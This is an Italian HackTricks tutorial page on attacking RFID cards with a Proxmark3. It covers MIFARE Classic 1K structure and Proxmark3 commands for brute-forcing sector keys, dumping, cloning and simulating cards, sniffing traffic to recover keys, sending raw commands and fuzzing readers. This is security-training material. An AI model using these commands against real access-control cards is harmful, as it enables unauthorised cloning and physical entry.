Proxmark 3

Reading time: 4 minutes

tip

Impara e pratica l'Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks

Attaccare i sistemi RFID con Proxmark3

La prima cosa che devi fare è avere un Proxmark3 e installare il software e le sue dipendenzes.

Attaccare MIFARE Classic 1KB

Ha 16 settori, ognuno dei quali ha 4 blocchi e ogni blocco contiene 16B. L'UID si trova nel settore 0 blocco 0 (e non può essere modificato).
Per accedere a ciascun settore hai bisogno di 2 chiavi (A e B) che sono memorizzate in blocco 3 di ciascun settore (settore trailer). Il settore trailer memorizza anche i bit di accesso che forniscono i permessi di lettura e scrittura su ciascun blocco utilizzando le 2 chiavi.
2 chiavi sono utili per dare permessi di lettura se conosci la prima e di scrittura se conosci la seconda (ad esempio).

Possono essere eseguiti diversi attacchi

bash
proxmark3> hf mf #List attacks

proxmark3> hf mf chk *1 ? t ./client/default_keys.dic #Keys bruteforce
proxmark3> hf mf fchk 1 t # Improved keys BF

proxmark3> hf mf rdbl 0 A FFFFFFFFFFFF # Read block 0 with the key
proxmark3> hf mf rdsc 0 A FFFFFFFFFFFF # Read sector 0 with the key

proxmark3> hf mf dump 1 # Dump the information of the card (using creds inside dumpkeys.bin)
proxmark3> hf mf restore # Copy data to a new card
proxmark3> hf mf eload hf-mf-B46F6F79-data # Simulate card using dump
proxmark3> hf mf sim *1 u 8c61b5b4 # Simulate card using memory

proxmark3> hf mf eset 01 000102030405060708090a0b0c0d0e0f # Write those bytes to block 1
proxmark3> hf mf eget 01 # Read block 1
proxmark3> hf mf wrbl 01 B FFFFFFFFFFFF 000102030405060708090a0b0c0d0e0f # Write to the card

Il Proxmark3 consente di eseguire altre azioni come l'intercettazione di una comunicazione Tag a Reader per cercare di trovare dati sensibili. In questa scheda potresti semplicemente sniffare la comunicazione e calcolare la chiave utilizzata perché le operazioni crittografiche utilizzate sono deboli e conoscendo il testo in chiaro e il testo cifrato puoi calcolarla (strumento mfkey64).

Comandi Grezzi

I sistemi IoT a volte utilizzano tag non marchiati o non commerciali. In questo caso, puoi utilizzare Proxmark3 per inviare comandi grezzi personalizzati ai tag.

bash
proxmark3> hf search UID : 80 55 4b 6c ATQA : 00 04
SAK : 08 [2]
TYPE : NXP MIFARE CLASSIC 1k | Plus 2k SL1
proprietary non iso14443-4 card found, RATS not supported
No chinese magic backdoor command detected
Prng detection: WEAK
Valid ISO14443A Tag Found - Quiting Search

Con queste informazioni potresti provare a cercare informazioni sulla scheda e sul modo di comunicare con essa. Proxmark3 consente di inviare comandi raw come: hf 14a raw -p -b 7 26

Script

Il software Proxmark3 viene fornito con un elenco precaricato di script di automazione che puoi utilizzare per eseguire semplici attività. Per recuperare l'elenco completo, utilizza il comando script list. Successivamente, utilizza il comando script run, seguito dal nome dello script:

proxmark3> script run mfkeys

Puoi creare uno script per fuzz tag readers, quindi copiando i dati di una carta valida basta scrivere uno script Lua che randomizzi uno o più byte casuali e controlli se il reader si blocca con qualche iterazione.

tip

Impara e pratica l'Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Impara e pratica l'Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks